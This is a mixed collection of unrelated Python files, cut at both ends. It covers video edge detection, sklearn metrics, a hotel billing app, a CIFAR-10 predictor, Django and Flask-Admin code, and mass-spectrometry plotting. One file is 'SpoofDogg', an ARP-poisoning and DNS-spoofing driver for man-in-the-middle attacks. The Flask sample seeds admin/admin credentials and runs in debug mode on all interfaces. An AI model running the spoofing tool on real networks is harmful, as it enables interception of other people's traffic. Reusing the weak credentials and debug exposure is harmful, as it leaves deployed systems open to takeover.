    json_broker = json.dumps({"Brokers": broker_info}, indent=4, default=str)
    print(json_broker)
# Script entry point: dump broker info for all regions to stdout.
get_mq_info()
|
import numpy
import cv2
#Determine source video
cap = cv2.VideoCapture("CelesteVideos/Level1.mp4")
# Output is half-resolution because each frame goes through pyrDown below.
# cap.get(3)/(4) are CAP_PROP_FRAME_WIDTH / CAP_PROP_FRAME_HEIGHT.
frame_width = int(cap.get(3) / 2)
frame_height = int(cap.get(4) / 2)
#Output file creation (isColor=False: single-channel edge frames)
out = cv2.VideoWriter('CelesteVideos/edgeDetection.mp4',cv2.VideoWriter_fourcc('M','P','4','V'), 30, (frame_width,frame_height), False)
while(cap.isOpened()):
    #ret is a boolean of if a frame was successfully captured
    ret, frame = cap.read()
    #frameTaken = (frameTaken + 1) % FRAMEGAP
    if (ret): #and frameTaken == 0:
        # downsample by 2x, then run Canny edge detection
        frame = cv2.pyrDown(frame)
        #Edge detection test
        edges = cv2.Canny(frame, 200, 450)
        """
        width = int(edges.shape[1] * scale_percent / 100)
        height = int(edges.shape[0] * scale_percent / 100)
        dim = (width, height)
        # resize image
        resized_edges = cv2.resize(edges, dim, interpolation = cv2.INTER_AREA)
        """
        out.write(edges)
        #cv2.imshow('Canny edge detection', edges)
        #Break if capture ends.
    else:
        break
    #Break if q is pressed
    if cv2.waitKey(1) & 0xFF == ord('q'):
        break
cap.release()
out.release()
cv2.destroyAllWindows()
from sklearn.metrics import accuracy_score, precision_score, recall_score, f1_score
import numpy as np
import pandas as pd
# Tutorial-style script: many expressions are evaluated bare (their
# values are only visible in an interactive session / notebook).
'''multiclass classification'''
y_true = np.array([2,0,2,2,0,1])
y_pred = np.array([0,0,2,2,0,1])
accuracy_score(y_true, y_pred)
recall_score(y_true, y_pred, average='micro')
recall_score(y_true, y_pred, average='macro')
recall_score(y_true, y_pred, average='weighted')
recall_score(y_true, y_pred, labels=[2], average=None) # recall for class 2: 2 is positive, everything else negative
recall_score(y_true, y_pred, labels=[0,1,2], average=None)
from sklearn.metrics import classification_report, confusion_matrix
print(classification_report(y_true, y_pred))
confusion_matrix(y_true, y_pred) # each row is a true class; each column counts predictions assigned to that class
'''binary classification
Even with only two distinct labels, anything other than 0/1 is treated as multiclass
'''
y_true2 = np.array([0,2,2,2,0,2])
y_pred2 = np.array([0,0,2,2,2,2])
recall_score(y_true2, y_pred2, pos_label = 2)
# setting pos_label binarizes the task into "is 2" vs "is not 2"
'''real dataset'''
data = pd.read_csv('https://drive.google.com/uc?export=download&id=1Bs6z1GSoPo2ZPr5jL2qDjRghYcMUOHbS')
# quality >= 7 counts as a "good" wine (positive class)
data['target'] = (data['quality']>=7)*1
data['target'].sum()/len(data) # imbalanced data set
from sklearn.linear_model import LogisticRegression
from sklearn.tree import DecisionTreeClassifier
from sklearn.model_selection import train_test_split
clf1 = LogisticRegression(C=1, max_iter=1000)
clf2 = DecisionTreeClassifier(max_depth=5)
X = data.drop(['quality', 'target'], axis=1)
y = data['target']
# stratify keeps the class ratio equal in train and validation splits
trnX, valX, trnY, valY = train_test_split(X,y,stratify=y, test_size=0.2, random_state=70)
clf1.fit(trnX, trnY)
clf2.fit(trnX, trnY)
y_pred1 = clf1.predict(valX)
y_pred2 = clf2.predict(valX)
print('Accuracy: Logistic = %.4f Tree=%.1f'%(accuracy_score(valY, y_pred1), accuracy_score(valY, y_pred2)))
# interests in good wine
metrics=[recall_score, precision_score, f1_score]
for nm, m in zip(('Recall', 'Precision', 'F1'), metrics):
    print('%s: Logistic = %.4f Tree=%.1f'%(nm, m(valY, y_pred1, pos_label=1), m(valY, y_pred2, pos_label=1)))
y_prob = clf1.predict_proba(valX)
from sklearn.metrics import roc_curve, roc_auc_score
fpr, tpr, thresholds = roc_curve(valY, y_prob[:, 1], pos_label=1)
import matplotlib.pyplot as plt
# ROC curve with the y=x chance line for reference
xx = np.linspace(0,1,10)
plt.plot(fpr, tpr)
plt.plot(xx,xx,'k--')
roc_auc_score(valY, y_prob[:,1])
|
import datetime
class hotel_manage:
    """Console-driven hotel billing: customer data, room rent, food and bill.

    Attribute roles (all amounts in the same unspecified currency):
    rt = running total, s = room rent, r = food bill, a = fixed
    service charge; p and t are extra-charge buckets that are
    initialised but never updated anywhere in this class.
    """
    def __init__(self, rt='', s=0, p=0, r=0, t=0, a=1000, name='', address='', cindate='', coutdate='', room_no=1):
        print("\n\n********WELCOME TO HOTEL TRANSYLVANIA********")
        self.rt = rt
        self.s = s
        self.p = p
        self.r = r
        self.t = t
        self.a = a
        self.name = name
        self.address = address
        self.cindate = cindate
        self.coutdate = coutdate
        self.room_no = room_no
    def input_data(self):
        """Prompt for customer details and compute the stay duration.

        Sets the module-level global ``dur`` to the 'N days' part of
        the checkout-minus-checkin timedelta; hotel_bill() reads it, so
        calling hotel_bill() before input_data() raises NameError.
        """
        self.name = input('\nEnter your full name: ')
        self.address = input('\nEnter your address: ')
        self.cindate = input('\nEnter your check in date (YYYY-MM-DD): ')
        self.coutdate = input('\nEnter your check out date (YYYY-MM-DD): ')
        # fromisoformat raises ValueError on a malformed date string
        a = datetime.date.fromisoformat(self.cindate)
        b = datetime.date.fromisoformat(self.coutdate)
        duration = str(b - a)
        global dur
        # str(timedelta) is e.g. '3 days, 0:00:00' -- keep only '3 days'
        dur = duration.split(',')[0]
        print('Your room no: ', self.room_no, '\n')
    def room_rent(self):
        """Ask for a room class and number of nights; store rent in self.s."""
        print('We have the following rooms for you:-')
        print('1. Class A----->10000')
        print('2. Class B----->8000')
        print('3. Class C----->6000')
        print('4. Class D----->4000')
        x = int(input('Please enter the number of your choice----->'))
        n = int(input('For how many nights did you stayL----->'))
        if x == 1:
            print('You have chosen a Class A room')
            self.s = 10000 * n
        elif x == 2:
            print('You have chosen a Class B room')
            self.s = 8000 * n
        elif x == 3:
            print('You have chosen a Class C room')
            self.s = 6000 * n
        elif x == 4:
            print('You have chosen a Class D room')
            self.s = 4000 * n
        else:
            # NOTE(review): invalid choice leaves self.s unchanged
            print('PLEASE CHOOSE A ROOM')
        print('Your chosen room rent is', self.s, '\n')
    def food_purchased(self):
        """Menu loop: accumulate restaurant purchases in self.r until EXIT."""
        print('********RESTAURANT MENU********')
        print('1.Dessert----->100', '2.Drinks----->50', '3.Breakfast----->90', '4.Lunch----->120', '5.Dinner----->180', '6.EXIT')
        while True:
            c = int(input('Enter the number of your choice: '))
            if c == 1:
                d = int(input('Enter the quantity: '))
                self.r += 100 * d
            elif c == 2:
                d = int(input('Enter the quantity: '))
                self.r += 50 * d
            elif c == 3:
                d = int(input('Enter the quantity: '))
                self.r += 90 * d
            elif c == 4:
                d = int(input('Enter the quantity: '))
                self.r += 120 * d
            elif c == 5:
                d = int(input('Enter the quantity: '))
                self.r += 180 * d
            elif c == 6:
                break
            else:
                print('You have entered an invalid key')
        print('Total food cost= Gh', self.r, '\n')
    def hotel_bill(self):
        """Print the itemised bill and advance the room counter."""
        print('********HOTEL BILL********')
        print('Customer details:')
        print('Customer name: ', self.name)
        print('Customer address: ', self.address)
        print('Check in date: ', self.cindate)
        print('Check out date: ', self.coutdate)
        print('Room no.', self.room_no)
        print(f'You spent {dur} at Hotel Transylvania')
        print('Your room rent is:', self.s)
        print('Your food bill is:', self.r)
        # sub total = rent + the (always zero) t and p buckets + food
        self.rt = self.s + self.t + self.p + self.r
        print('Your sub total purchased is:', self.rt)
        print('Additional Service Charges is:', self.a)
        print('Your Grandtotal purchased is:', self.rt + self.a, '\n')
        self.room_no += 1
def main():
    """Menu-driven console entry point for the hotel management flow."""
    # BUG FIX: the original did `a = hotel_manage` (binding the class object
    # itself), so every a.method() call failed with a missing-self TypeError.
    a = hotel_manage()
    while True:
        print('1. Enter Customer Data')
        print('2. Calculate Room Rent')
        print('3. Calculate Food Purchased')
        print('4. Show Total Cost')
        print('5. EXIT')
        b = int(input('\nEnter the number of your choice: '))
        if b == 1:
            a.input_data()
        elif b == 2:
            a.room_rent()
        elif b == 3:
            a.food_purchased()
        elif b == 4:
            a.hotel_bill()
        elif b == 5:
            # `break` ends the loop cleanly; quit() is meant for
            # interactive interpreter sessions only.
            break
if __name__ == '__main__':
    main()
    # BUG FIX: the walkthrough below previously sat at module level, so it
    # executed (with interactive prompts) whenever the module was merely
    # imported; it now only runs as a script, after the menu loop exits.
    emp = hotel_manage()
    emp.input_data()
    emp.room_rent()
    emp.food_purchased()
    emp.hotel_bill()
    # BUG FIX: the stray `emp.main` was a bare attribute access (a no-op),
    # and main() is a module-level function, not a method; line removed.
|
# Automatically generate a new scan object
class Autoupdate:
    """Placeholder for the auto-generated scan object (no behaviour yet)."""
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from Helper import *
from datetime import datetime
import math
import time
import numpy as np
import tensorflow as tf
import cifar10
# Set global variables
from settings import *
class Predicter():
    """Runs single-example CIFAR-10 evaluation against a trained checkpoint
    and appends the predicted class label to ``self.save_to_file``.
    (TensorFlow 1.x graph/session API.)
    """

    def __init__(self, name):
        # Input image geometry (CIFAR-10 images are 32x32).
        self.width = 32
        self.height = 32
        # Paths come from the project-wide settings module.
        self.eval_dir = global_path_to_cifar10eval_single_directory
        self.eval_data = 'test'
        self.checkpoint_dir = global_path_to_cifar10train100k
        self.eval_interval_secs = 60 * 5
        # Evaluate exactly one example per run.
        self.num_examples = 1
        self.run_once = True
        # self.batch_size = cifar10.batch_size
        self.batch_size = 1
        # File the predicted label is appended to.
        self.save_to_file = name

    def eval_once(self, saver, summary_writer, top_k_op, summary_op, logits):
        """Run Eval once.

        Args:
          saver: Saver.
          summary_writer: Summary writer.
          top_k_op: Top K op.
          summary_op: Summary op.
          logits: Logits tensor; row 0's argmax is the predicted class.
        """
        with tf.Session() as sess:
            ckpt = tf.train.get_checkpoint_state(self.checkpoint_dir)
            if ckpt and ckpt.model_checkpoint_path:
                # Restores from checkpoint
                saver.restore(sess, ckpt.model_checkpoint_path)
                # Assuming model_checkpoint_path looks something like:
                #   /my-favorite-path/cifar10_train/model.ckpt-0,
                # extract global_step from it.
                global_step = ckpt.model_checkpoint_path.split('/')[-1].split('-')[-1]
            else:
                print('No checkpoint file found')
                return
            # Start the queue runners.
            coord = tf.train.Coordinator()
            try:
                threads = []
                for qr in tf.get_collection(tf.GraphKeys.QUEUE_RUNNERS):
                    threads.extend(qr.create_threads(sess, coord=coord, daemon=True,
                                                     start=True))
                num_iter = int(math.ceil(self.num_examples / self.batch_size))
                true_count = 0  # Counts the number of correct predictions.
                total_sample_count = num_iter * self.batch_size
                step = 0
                while step < num_iter and not coord.should_stop():
                    predictions = sess.run([top_k_op])
                    # argmax over the first logits row gives the predicted class.
                    classification = sess.run(tf.argmax(logits[0], 0))
                    cifar10classes = ["0", "1"]
                    # BUG FIX: this file handle was opened and never closed
                    # (leak); the create/truncate side effect is preserved.
                    open(global_path_to_cifar10eval + 'workfile', 'w').close()
                    with open(self.save_to_file, "a") as myfile:
                        myfile.write(cifar10classes[classification])
                        myfile.write("\n")
                    print(cifar10classes[classification])
                    true_count += np.sum(predictions)
                    step += 1
                # Compute precision @ 1.
                precision = true_count / total_sample_count
                print('%s: precision @ 1 = %.3f' % (datetime.now(), precision))
                summary = tf.Summary()
                summary.ParseFromString(sess.run(summary_op))
                summary.value.add(tag='Precision @ 1', simple_value=precision)
                summary_writer.add_summary(summary, global_step)
            except Exception as e:  # pylint: disable=broad-except
                coord.request_stop(e)
            coord.request_stop()
            coord.join(threads, stop_grace_period_secs=10)

    def evaluate(self):
        """Eval CIFAR-10 for a number of steps."""
        with tf.Graph().as_default() as g:
            # Get images and labels for CIFAR-10.
            # BUG FIX: this line used `==` (a no-op comparison, flagged by any
            # linter); the intent was to force evaluation on the test split.
            self.eval_data = 'test'
            images, labels = cifar10.inputs(eval_data=self.eval_data)
            # Build a Graph that computes the logits predictions from the
            # inference model.
            logits = cifar10.inference(images)
            # Calculate predictions.
            top_k_op = tf.nn.in_top_k(logits, labels, 1)
            # Restore the moving average version of the learned variables for eval.
            variable_averages = tf.train.ExponentialMovingAverage(
                cifar10.MOVING_AVERAGE_DECAY)
            variables_to_restore = variable_averages.variables_to_restore()
            saver = tf.train.Saver(variables_to_restore)
            # Build the summary operation based on the TF collection of Summaries.
            summary_op = tf.merge_all_summaries()
            summary_writer = tf.train.SummaryWriter(self.eval_dir, g)
            while True:
                self.eval_once(saver, summary_writer, top_k_op, summary_op, logits)
                if self.run_once:
                    break
                # time.sleep(self.eval_interval_secs)
|
from django.contrib import admin
# Register your models here.
from .models import Banner
class BannerAdmin(admin.ModelAdmin):
    """Django admin configuration for Banner."""
    # Columns shown on the Banner change-list page.
    list_display = ["image", "name", "orders", "link"]

# Make Banner editable through the admin with the configuration above.
admin.site.register(Banner, BannerAdmin)
|
# Generated by Django 3.2 on 2021-06-11 12:00
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial schema for the Portfolio app: Portfolio plus its related
    MultipleImageUpload gallery rows."""

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Portfolio',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('ProjectName', models.CharField(max_length=50)),
                ('ProjectTitle', models.CharField(max_length=150)),
                # NOTE(review): the 'ClinentName' typo is frozen into migration
                # history; fix via a follow-up RenameField, not by editing this file.
                ('ClinentName', models.CharField(max_length=50)),
                ('LanguageUse', models.CharField(max_length=250)),
                ('ProjectUrl', models.CharField(max_length=250)),
                ('ProjectImage', models.ImageField(upload_to='portfolio/')),
                # NOTE(review): choices are strings but default is int 0 --
                # presumably should be '0'; confirm before altering history.
                ('UploadOption', models.CharField(choices=[('0', 'Image'), ('1', 'Slider Image'), ('2', 'Online Video'), ('3', 'Local Video')], default=0, max_length=1)),
            ],
        ),
        migrations.CreateModel(
            name='MultipleImageUpload',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('images', models.ImageField(upload_to='portfolio/')),
                ('portfolio', models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, to='Portfolio.portfolio')),
            ],
        ),
    ]
|
# -*- coding: utf-8 -*-
import os
from flask import Flask, url_for, redirect, render_template, request, abort
from flask_admin import Admin, AdminIndexView
from flask_admin.base import MenuLink
from flask_admin.contrib.sqla import ModelView
from flask_admin import helpers as admin_helpers
from flask_sqlalchemy import SQLAlchemy
from flask_security import Security, SQLAlchemyUserDatastore, \
UserMixin, RoleMixin, login_required, current_user
from flask_security.utils import encrypt_password
import flask_restless
from flask_cors import CORS
from datetime import datetime
from settings import *
app = Flask(__name__)
#Config
CORS(app)
"""
app.config['SQLALCHEMY_DATABASE_URI'] = "sqlite:///" + SETTINGS['DATABASE']
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.config['SECRET_KEY'] = SETTINGS['SECRET_KEY']
if SETTINGS['DEBUG']:
app.config['SQLALCHEMY_ECHO'] = True
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True
"""
app.config.from_pyfile('settings.py')
db = SQLAlchemy(app)
tagevento_table = db.Table('tag_evento',
db.Column('tag_id', db.Integer, db.ForeignKey('tag.id')),
db.Column('evento_id', db.Integer, db.ForeignKey('evento.id'))
)
rolesusers_table = db.Table(
'roles_users',
db.Column('responsavel_id', db.Integer(), db.ForeignKey('responsavel.id')),
db.Column('role_id', db.Integer(), db.ForeignKey('role.id'))
)
class Role(db.Model, RoleMixin):
    """A Flask-Security role (e.g. 'user', 'superuser')."""
    id = db.Column(db.Integer(), primary_key=True)
    name = db.Column(db.String(255), unique=True)
    description = db.Column(db.String(255))

    def __repr__(self):
        # Shown in admin select widgets.
        return self.name
class Orgao(db.Model):
    """An organisation (orgao) that owns events and users."""
    id = db.Column(db.Integer, primary_key=True)
    nome = db.Column(db.String(255))

    def __repr__(self):
        return self.nome
class Tipo(db.Model):
    """An event type (tipo)."""
    id = db.Column(db.Integer, primary_key=True)
    tipo = db.Column(db.String(255))

    def __repr__(self):
        return self.tipo
class Tag(db.Model):
    """A free-form tag/category attached to events via tag_evento."""
    id = db.Column(db.Integer, primary_key=True)
    tag = db.Column(db.String(255))

    def __repr__(self):
        return self.tag
class Responsavel(db.Model, UserMixin):
    """An event owner; doubles as the Flask-Security user account."""
    id = db.Column(db.Integer, primary_key=True)
    nome = db.Column(db.String(255))
    orgao_id = db.Column(db.Integer, db.ForeignKey('orgao.id'))
    orgao = db.relationship('Orgao')
    email = db.Column(db.String(255), unique=True)
    tel = db.Column(db.String(255))
    data_registro = db.Column(db.DateTime)
    password = db.Column(db.String(255))
    active = db.Column(db.Boolean())
    confirmed_at = db.Column(db.DateTime())
    roles = db.relationship('Role', secondary=rolesusers_table,
        backref=db.backref('Responsavel', lazy='dynamic'))

    def __repr__(self):
        return self.nome

    def is_authenticated(self):
        # NOTE(review): recent Flask-Login versions define is_authenticated
        # as a *property*; overriding it with a method may bypass the normal
        # semantics -- confirm against the installed library version.
        return self.active
class Evento(db.Model):
    """An event in the public agenda, linked to an organisation, an owner
    (Responsavel), a type, and free-form tags."""
    id = db.Column(db.Integer, primary_key=True)
    titulo = db.Column(db.String(255), unique=False)
    # BUG FIX: `local` was declared twice in this class; only the later
    # declaration took effect, so the redundant earlier one was removed.
    orgao_id = db.Column(db.Integer, db.ForeignKey('orgao.id'))
    orgao = db.relationship('Orgao')
    responsavel_id = db.Column(db.Integer, db.ForeignKey('responsavel.id'))
    responsavel = db.relationship('Responsavel')
    tipo_id = db.Column(db.Integer, db.ForeignKey('tipo.id'))
    tipo = db.relationship('Tipo')
    local = db.Column(db.String(255))
    endereco = db.Column(db.String(255))
    data_inicio = db.Column(db.DateTime)
    data_fim = db.Column(db.DateTime)
    horario = db.Column(db.String(255))
    descricao = db.Column(db.Text)
    link = db.Column(db.String(255))
    # Path/URL of the event poster.
    cartaz = db.Column(db.String(255))
    tags = db.relationship('Tag', secondary=tagevento_table)

    def __repr__(self):
        return '<Titulo %r>' % self.titulo
# Setup Flask-Security
# Responsavel is the user model, Role the role model.
user_datastore = SQLAlchemyUserDatastore(db, Responsavel, Role)
security = Security(app, user_datastore)
# Create customized model view class
class LoginRequired():
    """Mixin for admin views: unauthenticated users are redirected to the
    login page; authenticated-but-unauthorised users receive a 403."""
    # Override builtin _handle_view in order to redirect users when a view is not accessible.
    def _handle_view(self, name, **kwargs):
        if not self.is_accessible():
            if current_user.is_authenticated:
                # Logged in but lacking the required role.
                abort(403)
            else:
                # Not logged in: bounce to the login page, return here after.
                return redirect(url_for('security.login', next=request.url))
class IndexView(LoginRequired, AdminIndexView):
    """Admin dashboard; visible to any authenticated user."""
    def is_accessible(self):
        return current_user.is_authenticated
class SuperuserView(LoginRequired, ModelView):
    """Model admin restricted to users holding the 'superuser' role."""
    def is_accessible(self):
        return current_user.has_role('superuser')
class UserView(LoginRequired, ModelView):
    """Model admin restricted to users holding the 'user' role."""
    def is_accessible(self):
        return current_user.has_role('user')
# Custom admin view for Evento.
class EventoView(UserView):
    """Evento admin view; relabels the `tags` column as "Categorias"."""
    column_labels = dict(tags="Categorias")

    def on_form_prefill(self, form, id):
        # NOTE(review): debug print left in; consider logging or removing.
        print(form)
@app.route("/")
def index():
return redirect(url_for('admin.index'))
# Flask-Admin site using the login-guarded dashboard defined above.
admin = Admin(app, name='Agenda Publica', template_mode='bootstrap3', index_view=IndexView())
# Add administrative views here
admin.add_view(EventoView(Evento, db.session))
#admin.add_view(SuperuserView(Evento, db.session))
admin.add_view(SuperuserView(Responsavel, db.session))
admin.add_view(SuperuserView(Orgao, db.session))
admin.add_view(SuperuserView(Tipo, db.session))
admin.add_view(SuperuserView(Tag, db.session))
admin.add_link(MenuLink(name='Logout', endpoint='security.logout'))
# Create the Flask-Restless API manager.
manager = flask_restless.APIManager(app, flask_sqlalchemy_db=db)
# Create API endpoints, which will be available at /api/<tablename> by
# default. Allowed HTTP methods can be specified as well.
# Events are exposed read-only (GET).
manager.create_api(Evento, methods=['GET'])
@security.context_processor
def security_context_processor():
    """Expose the Flask-Admin base template and helpers to Flask-Security's
    templates so its pages can reuse the admin layout."""
    return dict(
        admin_base_template=admin.base_template,
        admin_view=admin.index_view,
        h=admin_helpers,
    )
def build_sample_db():
    """
    Populate a small db with some example entries.

    Drops and recreates all tables, then seeds the 'user' and 'superuser'
    roles plus one admin account holding both.
    """
    # NOTE(review): drop_all/create_all run outside the app_context block
    # below -- presumably fine because `app` is bound at module scope; confirm.
    db.drop_all()
    db.create_all()
    with app.app_context():
        user_role = Role(name='user')
        super_user_role = Role(name='superuser')
        db.session.add(user_role)
        db.session.add(super_user_role)
        db.session.commit()
        # NOTE(review): hard-coded admin/admin credentials -- fine for a
        # sample DB, never for production.
        test_user = user_datastore.create_user(
            nome='Admin',
            email='admin',
            password=encrypt_password('admin'),
            roles=[user_role, super_user_role]
        )
        db.session.commit()
    return
if __name__ == "__main__":
# Build a sample db on the fly, if one does not exist yet.
"""
app_dir = os.path.realpath(os.path.dirname(__file__))
database_path = os.path.join(app_dir, SETTINGS['DATABASE'])
if not os.path.exists(database_path):
build_sample_db()
"""
app.run(host='0.0.0.0', debug=True)
|
# Generated by Django 2.2.11 on 2020-03-13 19:23
from django.db import migrations, models
class Migration(migrations.Migration):
    """Replace Detail.employments_url with two optional CharFields:
    Hire_date and emp_type."""

    dependencies = [
        ('orgchart', '0006_auto_20200314_0011'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='detail',
            name='employments_url',
        ),
        # NOTE(review): hire date stored as CharField rather than DateField --
        # presumably mirrors an upstream API string; confirm.
        migrations.AddField(
            model_name='detail',
            name='Hire_date',
            field=models.CharField(max_length=40, null=True),
        ),
        migrations.AddField(
            model_name='detail',
            name='emp_type',
            field=models.CharField(max_length=40, null=True),
        ),
    ]
|
#!/usr/bin/env python3
import argparse
import time
import os
import sys
import multiprocessing
from arp_spoofer import spoof, restore, enable_ip_routing
from dns_spoofer import dns_main
# Abort immediately when invoked without any arguments (argparse would also
# complain, but this preserves the original friendly hint).
# IDIOM FIX: rewritten from a conditional-expression-as-statement one-liner.
if len(sys.argv[1:]) == 0:
    sys.exit("Use the -h parameter to learn about using the program.")

description = "SpoofDogg is a tool that initially starts an ARP spoofing attack. " \
              "It can also be started to initiate an automatic DNS spoofing attack afterwards as well"
parser = argparse.ArgumentParser(description=description)
parser.add_argument("target", help="Victim IP address to poison")
parser.add_argument("host", help="The host to intercept packets from. Usually this is the gateway")
parser.add_argument("-dns", "--dns_spoof", help="Start DNS spoofing after ARP poisoning. "
                    "Only works on Linux machines due to iptables usage.", action="store_true")
args = parser.parse_args()
def get_arguments():
    """
    Read the parsed CLI options.

    :return: (target_ip, host_ip) tuple taken from the global `args`.
    """
    return args.target, args.host
def dns_check():
    """Abort when DNS spoofing is requested on Windows; the feature relies
    on iptables and therefore only works on Linux."""
    is_windows = "nt" in os.name
    if is_windows and args.dns_spoof:
        sys.exit("DNS spoofing is only available for machines running a Linux distro.")
def spoofy():
    """Continuously ARP-poison both directions (victim <-> gateway),
    re-sending the spoofed replies once per second."""
    # Get target and host
    target, host = get_arguments()
    while True:
        # Tell the victim that we are the gateway
        spoof(target, host)
        # Tell the gateway that we are the target (victim)
        spoof(host, target)
        # Sleep for a second to prevent a dos
        time.sleep(1)
def main():
    """Run the ARP-poisoning process (and optionally the DNS spoofer),
    restoring the network when interrupted with Ctrl-C."""
    target, host = get_arguments()
    # Check DNS compatibility
    dns_check()
    # Enable ip forwarding for the system
    enable_ip_routing()
    # Create processes
    arper = multiprocessing.Process(target=spoofy)
    # BUG FIX: the original passed target=dns_main() -- calling dns_main()
    # immediately in *this* process instead of handing the callable to the
    # child process.
    dns_spoofer = multiprocessing.Process(target=dns_main)
    # Start processes
    try:
        arper.start()
        if args.dns_spoof:
            dns_spoofer.start()
        # BUG FIX: without a join, start() returned instantly and the
        # KeyboardInterrupt handler below could essentially never fire.
        arper.join()
    except KeyboardInterrupt:
        # Stop processes. BUG FIX: .close() raises ValueError on a process
        # that is still running; terminate() is the correct shutdown call.
        arper.terminate()
        if dns_spoofer.is_alive():
            dns_spoofer.terminate()
        # Restore the network
        restore(target, host)
        restore(host, target)
        if args.dns_spoof:
            os.system("iptables --flush")
# Standard script entry point.
if __name__ == '__main__':
    main()
|
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from glob import glob
import os
def generate_clist(NUM_COLORS):
    """Return NUM_COLORS RGBA colours sampled (in reverse) from the
    matplotlib 'cool' colormap."""
    import pylab
    cmap = pylab.get_cmap('cool')
    return [cmap(1 - 1. * idx / NUM_COLORS) for idx in range(NUM_COLORS)]
def weighted_avg_and_std(values, weights):
    """
    Return the weighted average and standard deviation.

    values, weights -- Numpy ndarrays with the same shape.
    NaN entries in *values* are masked out of both statistics.
    """
    # Mask NaNs so they contribute to neither the mean nor the variance.
    clean = np.ma.masked_array(values, np.isnan(values))
    mean = np.ma.average(clean, weights=weights)
    # Fast and numerically precise weighted variance.
    variance = np.ma.average((clean - mean) ** 2, weights=weights)
    return mean, np.sqrt(variance)
def ims_plot(fpath, mass, tolerance, norm_cv, outname, title_label=None,
             charge=None, figsize=None, ylim=None, xlim=None, legend=True):
    """
    Plot IMS unfolding plot by normalising to drift time at certain collision
    voltage.

    Parameters
    ----------
    fpath : str or list
        Either glob pattern or list of paths to csv output files from PULSAR.
    mass : int
        Mass to extract from the csv file (in case there are multiple forms).
    tolerance : int
        Tolerance range for the mass. Allows pooling multiple species.
    norm_cv : int
        Collision voltage to normalise drift times to. Must be present in all datasets.
    outname : str
        Path to save the figure (without extension).
    title_label : str, optional
        Title to plot above the plot. The default is the filepath.
    charge : int, optional
        Only plot drift times from a single charge state. The default is all charge states.
    figsize, ylim, xlim : tuple, optional
        Forwarded to matplotlib (figure size and axis limits).
    legend : bool, optional
        Whether to draw the legend. Default True.

    Raises
    ------
    Exception
        If the glob pattern or list did not match existing files, or the
        mass filter leaves an empty subset.

    Returns
    -------
    (list, list)
        Per-file filtered DataFrames and per-file averaged DataFrames.
        (The original docstring claimed None; the code returns these.)
    """
    # NOTE(review): `!= None` should idiomatically be `is not None` (here and below).
    if figsize != None:
        fig, ax = plt.subplots(1,1, figsize=figsize)
    else:
        fig, ax = plt.subplots(1,1)
    file_dfs = []
    if not isinstance(fpath, list):
        try:
            for file in glob(fpath):
                temp = pd.read_csv(file)
                temp['file'] = file
                file_dfs.append(temp)
        except:
            # NOTE(review): bare except masks the real pandas/IO error;
            # consider re-raising with `from` or narrowing the clause.
            raise Exception("Could not open glob pattern {}".format(fpath))
    else:
        for file in fpath:
            temp = pd.read_csv(file)
            temp['file'] = file
            file_dfs.append(temp)
    data = pd.concat(file_dfs)
    g = data.groupby('file')
    color = generate_clist(g.ngroups)
    subsets = []
    averages = []
    for ix, filename in enumerate(g.groups.keys()):
        subset = g.get_group(filename)
        # filter by mass (as provided in input)
        subset = subset[(subset['mass'] > mass-tolerance) & (subset['mass'] < mass+tolerance)]
        # filter by charge if requested
        if charge != None:
            print('Filtering by charge {}'.format(charge))
            subset = subset[subset['z'] == charge]
        # warn if the filters remove everything
        if len(subset) == 0:
            raise Exception("Subset after mass filtering is emtpy. Did you use the right mass?")
        # ignore data points with less than 10% basepeak intensity
        subset['basepeak_intensity'] = subset.groupby('collision_voltage')['drift_intensity'].transform('max')
        subset = subset[subset['drift_intensity'] > 0.1 * subset['basepeak_intensity']]
        # sort ascending by collision voltage
        subset.sort_values(by='collision_voltage', inplace=True)
        # normalise by the drift_time of the lowest charge state within charge
        # state groups!
        chargestates = subset['z'].unique()
        for z in chargestates:
            c = subset[subset['z'] == z]
            # use the mean to circumvent the problem, that selection returns a
            # list while we need a single value
            # also allows selecting CV ranges for normalisation
            subset.loc[subset['z'] == z, 'rel_drift_center'] =\
                100*c['drift_center'] / c[c['collision_voltage'] == norm_cv]['drift_center'].mean()
        # init an empty dataframe with only the index
        average = pd.DataFrame(index=subset['collision_voltage'].unique())
        # Normalisation procudes NaN for charge states that did not occur at
        # the desired collision voltage range -> need to ignore in average and
        # std calculations
        average[['Mean', 'Std']] = subset.groupby('collision_voltage').apply(lambda x: weighted_avg_and_std(x['rel_drift_center'], weights=x['drift_intensity'])).tolist()
        # label = str(subset['file_name'].unique()[0])[-30:]
        label = filename[-30:]
        ax.plot(average['Mean'],
                color=color[ix],
                label=label)
        # Shade +/- 1 std around the mean, with dotted outlines.
        ax.fill_between(average.index, average['Mean']-1*average['Std'],
                        average['Mean'] + 1*average['Std'],facecolor=color[ix],
                        alpha=0.1)
        ax.plot(average.index, average['Mean']-1*average['Std'],
                color=color[ix],
                linestyle='dotted')
        ax.plot(average.index, average['Mean']+1*average['Std'],
                color=color[ix],
                linestyle='dotted')
        subsets.append(subset)
        averages.append(average)
    if legend:
        plt.legend()
    if not title_label:
        title_label = ' '.join(fpath.split(os.path.sep)[-2:])
    ax.set_title(title_label)
    ax.set_xlabel('Collision voltage [V]')
    ax.set_ylabel('Relative Drift Time [%]')
    if ylim:
        ax.set_ylim(ylim)
    if xlim:
        ax.set_xlim(xlim)
    plt.savefig(outname + ".pdf")
    plt.savefig(outname + ".png")
    plt.show()
    return subsets, averages
import webapp2
from webapp2_extras import jinja2
from google.appengine.ext import ndb
from model.libroCientifico import libroCientifico
from google.appengine.api import users
class EditarLibroCientificoHandler(webapp2.RequestHandler):
    """GAE handler that shows (GET) and saves (POST) the edit form for a
    scientific book (libro cientifico)."""

    def get(self):
        user = users.get_current_user()
        if user:
            try:
                id_libroCientifico = self.request.GET["id_libroCientifico"]
            except:
                # NOTE(review): bare except plus an "ERROR" sentinel --
                # ndb.Key(urlsafe="ERROR") below will raise anyway; consider
                # a proper 400 response.
